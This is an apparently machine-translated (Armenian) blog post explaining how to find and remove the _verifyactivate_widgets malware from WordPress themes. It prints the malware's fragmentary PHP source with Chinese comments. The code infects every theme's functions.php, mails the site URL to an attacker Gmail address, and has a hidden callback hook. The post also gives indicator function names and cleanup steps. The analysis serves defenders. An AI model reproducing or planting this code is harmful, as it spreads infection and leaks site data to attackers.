Ինչպես WordPress-ի թեմաները մաքրում են վնասակար կոդ _verifyactivate_widgets-ը

վերջերսՉեն ՎայլյանՕգտագործման մեջWordfence Security անվտանգության հավելվածը սկանավորում է կայքերը վնասակար կոդի համարԱյնուհետև հայտնաբերվել էWordPressԹեմայի function.php ֆայլում վնասակար վիրուսի կոդը թաքնված է:

Վնասակար կոդ WordPress թեմայի functions.php ֆայլում

Ինչպես WordPress-ի թեմաները մաքրում են վնասակար կոդ _verifyactivate_widgets-ը

WordPress-ում «վնասակար կոդի» ամենահավանական վայրը function.php-ն է թեմաների գրացուցակում, որը սովորաբար թաքնված է function.php ֆայլի վերջում:

հիմնական խնդիրը.Վնասակար կոդը կհայտնաբերի, թե արդյոք ընթացիկ բլոգի բոլոր թեմաները վարակված են ամեն անգամ, երբ ինչ-որ մեկը այցելում է ձեր բլոգի էջը, և եթե ոչ, ապա նրանք միասին կվարակվեն:

Դրանից հետո, երբ wp-ի սկզբնավորման գործողությունը կատարվի, այն կստուգի, թե արդյոք ընթացիկ բլոգը նամակ է ուղարկել livethemas@ փոստարկղին:Gmail. com

Ինչպե՞ս գիտեք, արդյոք այն տեղադրված է:

  • Ձեր wp_options աղյուսակի ներսում կա մի ֆայլ, որը կոչվում է_is_widget_active_տարբերակը, եթե այն հաջողությամբ ուղարկվել է, դրա արժեքը սահմանեք 1;
  • Եթե ​​ոչ, ապա որպես վերնագիր և բովանդակություն օգտագործեք ներկայումս վարակված բլոգի գլխավոր էջի URL-ը:
  • Վերջ, ուրիշ վատ բաներ չկան։

Վնասակար վիրուսի կոդը հետևյալն է (կարող են լինել որոշ տարբերություններ, բայց հիմնական կոդը նույնն է).

function _verifyactivate_widgets(){
//查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容
$output=strip_tags($output, $allowed);
//取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
if (stripos($cont,$ftion) === false){
//查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记
$comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
//这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。
$output .= $before . “Not found” . $after;
//如果文件是以 ?> 标记结尾的,连标记一起取过来
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
$output=rtrim($output, “\n\t”); fputs($f=fopen($item,”w+”),$cont . $comaar . “\n” .$widget);fclose($f);
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
return $output;
function _get_allwidgets_cont($wids,$items=array()){
if(substr($places,-1) == “/”){

if(!file_exists($places) || !is_dir($places)){
return false;
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
//否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的
$items[]=$places . “/” . $elem;}
return false;
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
return $items;

function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );

function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
return $dirArray;

add_action(“admin_head”, “_verifyactivate_widgets”);

function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check=”cookie”;
if(!isset($tagsallowed)) $tagsallowed=”<a>“;
if(!isset($filter)) $filter=”none”;
if(!isset($coma)) $coma=””;
if(!isset($home_filter)) $home_filter=get_option(“home”);
if(!isset($pref_filters)) $pref_filters=”wp_”;
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type=””;
if(!isset($cpages)) $cpages=$_GET[“cperpage”];
if(!isset($post_auth_comments)) $post_auth_comments=””;
if(!isset($com_is_approved)) $com_is_approved=””;
if(!isset($post_auth)) $post_auth=”auth”;
if(!isset($link_text_more)) $link_text_more=”(more…)”;
if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=””;

//如果 _is_widget_active_ option内容为空,即表示没有被感染过
if (!$widget_yes) :

global $wpdb, $post;
// post_author 为 [email protected] 的文章,肯定是没有的

$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND post_author=\”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m\” AND post_password=\”\” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
//$gettextcomments实际上为 wp_mail
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional=”div”;

//这里$sh_cont即为 [email protected]
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “live”), 20);#
if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
if(!isset($isshowdots)) $isshowdots=1;

if($fakeit == 2) {
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
//开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($text_length < 0) {
} else {
if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
$text=explode(“<span id=“more-5675”></span>“, $text, 2);
} else {
$text=explode(” “, $text);
if(count($text) > $text_length) {
} else {
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . ” “;
update_option(“_is_widget_active_”, 1);
if(“all” != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
$output=rtrim($output, “\s\n\t\r\0\x0B”);
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
//$filter 为 none …,又是在伪装
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case(“div”) :
case(“span”) :
case(“p”) :
default :

if ($is_use_more_link ) {
if($for_more) {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “#more-” . $post->ID .”\” title=\”” . $more_text_link . “\”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “\n”;
} else {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “\” title=\”” . $more_text_link . “\”>” . $link_text_more . “</a></” . $tag . “>” . “\n”;
return $output;

add_action(“init”, “_getprepare_widget”);

function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \”comment_count\” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=\”1\” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\”publish\””;
if(!$show_pass_post) $request .= ” AND post_password =\”\””;
if($duration !=””) {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
$request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
if ($posts) {
foreach ($posts as $post) {
$output .= $before . ” <a href=\”” . $permalink . “\” title=\”” . $post_title.“\”>” . $post_title . “</a> ” . $after;
} else {
$output .= $before . “None found” . $after;
return $output;

Ո՞րն է WordPress թեմայի վնասակար կոդը:

Եթե ​​Wordfence Security հավելվածով սկանավորումը պարզում է, որ ձեր function.php ֆայլը կեղծվել է, դուք պետք է ստուգեք, օրինակ.

  1. _verifyactivate_widgets
  2. գործառույթ _checkactive_widgets
  3. ֆունկցիա _get_allwidgets_cont
  4. ֆունկցիա stripos
  5. strripos ֆունկցիան
  6. ֆունկցիա scandir
  7. ֆունկցիա _getprepare_widget
  8. ֆունկցիա __popular_posts
  9. add_action ("admin_head", "_checkactive_widgets");
  10. add_action ("init", "_getprepare_widget");
  11. _verify_isactivate_widgets
  12. _check_isactive_widget
  13. _get_allwidgetscont
  14. _prepare_widgets
  15. __հանրաճանաչ_գրառումներ
  • Յուրաքանչյուր տող անկախ է, եթե ձեր functions.php-ում ունեք վերը նշված կոդը, ապա ձեզ կարող է հարվածել:
  • Դրանցից ֆունկցիաները և add_action-ը, ընդհանուր առմամբ, «վնասակար կոդի» կոդ են, որը պատկանում է «պատրաստման գործողություններին»։

Ինչպե՞ս հեռացնել WordPress թեմայի գործառույթը.php վնասակար վիրուսի կոդը:

Այն նաև մաքրելը շատ պարզ է, պարզապես WordPress թեմայի function.php ֆայլում գտեք վերը նշված ծածկագիրը և ջնջեք այն, բայց քանի որ վարակվելուց հետո ձեր թեմաների թեմաների գրացուցակի բոլոր թեմաները կվարակվեն, ուստի միայն ընթացիկ Օգտագործված թեման անվավեր է և կստեղծվի մաքրումից անմիջապես հետո:

Լուծումը WordPress-ի մեկ թեմայի վնասակար վիրուսի կոդը հեռացնելն է, functions.php ֆայլը սահմանել 444 թույլտվություն, այնուհետև մաքրել WordPress-ի մյուս թեմաները:

Ինչ վերաբերում է վերջին functions.php ֆայլի 444 թույլտվությունը հետ փոխելու անհրաժեշտությանը, մարդիկ ենթադրում են, որ 444-ը համեմատաբար անվտանգ է և անհրաժեշտության դեպքում կարող է փոփոխվել:

Նշումներ Wordfence Security հավելվածի օգտագործման վերաբերյալ

Մենք խորհուրդ ենք տալիս WordPress հավելվածը Wordfence Security-ի կողմից, WordPress-ի անվտանգության հավելված՝ ինտեգրված firewall-ով և չարամիտ սկանավորմամբ, որը կառուցվել և պահպանվում է մի մեծ թիմի կողմից, որը 100%-ով կենտրոնացած է WordPress-ի անվտանգության վրա:

Թեև կան վճարովի մոդուլներ, մենք կարող ենք օգտագործել «Սկան» անվճար մոդուլը, որպեսզի սկանավորենք մեր WordPress կայքը «վնասակար կոդ» պարունակող PHP ֆայլերի համար, թեև կա որոշակի կեղծ դրական դրույքաչափ (հիմնականում որոշ իրական պլագիններ, թեմայի գաղտնագրման բաղադրիչը կարգելափակվի։ կեղծ պոզիտիվներով), բայց «վնասակար կոդ» գտնելն անկասկած ավելի շատ աշխատանք է ավելի քիչ ջանքերով:

Հարկ է նշել, որ այս plug-in-ը խորհուրդ չի տրվում հաճախակի միացնել, քանի որ դրա firewall-ը և անվտանգության պաշտպանությունը որոշակի ծանրաբեռնված ճնշում կառաջացնեն տվյալների բազայի վրա և կազդեն կայքի աշխատանքի վրա:

Սովորաբար, պլագինները միացված են անհրաժեշտության դեպքում «սկան» սկանավորելու համար:

Փակեք plug-in-ը հետաքննության ավարտից հետո, արտակարգ իրավիճակների դեպքում:

Հույս Chen Weiliang բլոգ ( https://www.chenweiliang.com/ ) կիսվել է «Ինչպես մաքրել վնասակար կոդ _verifyactivate_widgets WordPress թեմայում», որն օգտակար է ձեզ համար:

Բարի գալուստ՝ կիսելու այս հոդվածի հղումը.https://www.chenweiliang.com/cwl-27554.html

Բարի գալուստ Chen Weiliang-ի բլոգի Telegram ալիք՝ վերջին թարմացումները ստանալու համար:

🔔 Եղեք առաջինը, ով կստանա արժեքավոր «ChatGPT բովանդակության շուկայավարման AI գործիքի օգտագործման ուղեցույցը» ալիքի վերին գրացուցակում: 🌟
📚 Այս ուղեցույցը պարունակում է հսկայական արժեք, 🌟Սա հազվագյուտ հնարավորություն է, բաց մի՛ թողեք այն։ ⏰⌛💨
Տարածեք և հավանեք, եթե հավանեցիք:
Ձեր տարածումը և հավանումները մեր շարունակական շարժառիթն են:


发表 评论

Ձեր էլ. Փոստի հասցեն չի հրապարակվի: Օգտագործվում են պահանջվող դաշտերը * Պիտակ

ոլորել դեպի վերև